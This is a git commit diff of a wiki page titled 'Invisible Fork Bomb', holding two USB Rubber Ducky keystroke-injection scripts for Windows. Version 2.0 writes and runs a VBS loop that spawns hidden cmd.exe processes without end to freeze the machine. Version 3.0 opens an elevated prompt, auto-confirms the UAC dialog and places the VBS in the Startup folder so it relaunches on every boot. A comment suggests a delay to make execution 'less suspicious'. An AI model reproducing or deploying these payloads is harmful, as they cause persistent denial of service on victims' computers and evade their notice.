Updated Invisible Fork Bomb (markdown)

This commit is contained in:
BlueArduino20 2017-06-24 19:15:26 +02:00
parent f4117f1c09
commit e88241dab9
1 changed files with 32 additions and 9 deletions

View File

@ -1,16 +1,15 @@
# Invisible Fork Bomb
The script creates and starts a vbs that executes exponentially cmd.exe without visible windows (Fork bomb -> Freezes the PC).
# Invisible Fork Bomb [Windows]
**V. 2.0:** The script creates and starts a vbs that executes exponentially cmd.exe without visible windows (Fork bomb -> Freezes the PC).
# About...
Author: [BlueArduino20](https://github.com/BlueArduino20/)
**V. 3.0:** The same, but it sets the vbs file into the startup.
Version 2.0
**Original repository:** <a href="https://github.com/BlueArduino20/Invisible_fork_bomb">https://github.com/BlueArduino20/Invisible_fork_bomb</a>
Repository: [https://github.com/BlueArduino20/Invisible_fork_bomb](https://github.com/BlueArduino20/Invisible_fork_bomb)
**Author:** BlueArduino20
<h2>Code for Ducky [2.0]</h2>
# Code
<pre><code>DELAY 1000
REM ^ You should set more delay time if your computer is slow or if the script doesn't work correctly.
GUI r
DELAY 500
STRING cmd
@ -27,6 +26,30 @@ CTRL z
ENTER
DELAY 50
STRING start forkb.vbs && exit
REM You can add this: ">null ping localhost -n 5 && " before "start" to make a (5 sec) delay before the vbs execution. (By this way it's less suspicious)
ENTER
</pre></code>
<h2>Code for Ducky [3.0]</h2>
[Warning] That version sets the vbs file into the startup.
<pre><code>DELAY 1000
CTRL ESC
DELAY 500
STRING cmd
CTRL SHIFT ENTER
DELAY 400
ALT y
DELAY 500
STRING copy con "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FB.vbs"
ENTER
STRING do
ENTER
STRING CreateObject("Wscript.Shell").Run "cmd", 0, False
ENTER
STRING loop
CTRL z
ENTER
DELAY 50
STRING start FB.vbs && exit
ENTER
</pre></code>